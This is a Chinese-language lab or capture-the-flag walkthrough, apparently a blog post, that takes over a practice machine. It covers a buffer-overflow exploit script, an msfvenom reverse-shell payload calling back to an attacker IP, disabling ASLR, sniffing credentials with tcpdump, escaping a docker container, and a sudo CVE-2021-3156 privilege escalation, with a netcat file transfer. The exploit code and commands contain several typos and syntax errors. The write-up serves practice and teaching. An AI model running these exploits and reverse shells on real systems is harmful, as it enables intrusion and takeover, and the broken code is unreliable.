1.常规端口服务扫描发现
2.80端口没有得到任何有用的信息,21端口ftp可以匿名登录,登录进之后发现一个可以下载的文件
,下载后保存到本机并运行程序,在本机进程里发现运行成功,最后本机上开放了9898端口,运行后
发现只能执行普通的命令
3.进行程序的缓冲区溢出调试,首先关闭kali本机的alsr内存随机化技术
cd /proc/sys/kernel
cat randomize_va_space
echo 0 > randomize_va_space
4.开始进行调试,安装调试工具 edb-debugger
输入五百个A后发现报错说明存在缓冲区漏洞
用工具生成五百个不重复的字节 msf-pattern_create -l 500
计算溢出字符偏移量 msf-pattern_offset -l 500 -q 64413764
编辑exp.py发送攻击载荷
#! /usr/bin/python
import sys,socket
payload=‘A’*112+‘B’*4+‘C’*32
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s=connet((‘127.0.0.1’,9898))
s.send((payload))
s.close()
execpt:
print(“wrong!”)
sys.exit()
chmode +x exp.py
执行脚本发现成功精确写入四个B,尝试在eip中写入跳转到esp的汇编指令,在esp中执行一个
二进制的文件,使用msf模块下的内容
\x55\x9d\xx04\x08
msfvenom -p linux/x86/shell_reverse_tcp LOST=10.0.0.15 LPORT=4444 -b “\x00” -f py
-b是为了剔除坏字符防止程序终止
payload=‘A’*112+‘B’*4+‘\x90’*32+‘C’*32 加x90是空指令,是为了程序的执行更加的顺滑
开启侦听端口执行程序后,成功拿下shell突破外围
/bin/sh -i升级shell
- ls -la 发现mycreds文件,cred信誉,查看得到账号密码,22端口ssh登录失败,但是2222端口
ssh登录成功,ip a发现是一个docker的容器,sudo -l发现可以任意切换sudo权限
sudo到root权限,查看/root目录下的文件,ls -la 发现一系列文件,note文件下提示进行流量抓取
6.使用tcpdump进行流量抓包分析
tcpdump -i eth0 port 21截获了用户名和密码
ssh登录成功成功突破容器,进入真正主机
7.开始进行提权cve-2021-3156
这个漏洞基于堆溢出漏洞进行提权
lsb_release -a 查看操作系统版本sudo --version查看sudo权限
sudodit -s ‘’ perl -e 'print "A" x 65536'
在msf中找到当前利用代码,但是需要一个session才能使用,尝试进行建立一个session
使用auxiliary/scanner/ssh/ssh_login中的模块建立ssh会话
一切设置好后执行但是一直失败,尝试修改WriteableDir /home/harry也失败
8.手 动修改代码,将sudo路径修改为/usr/bin/sudo,再次在靶机上执行程序,
nc -nvlp 4444 >exp.py
nc 10.0.2.44 4444 <exp.py -w 1 -w 1意思是传输成功后一秒后断开连接
最终提权成功拿下root权限打靶完成
4654
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
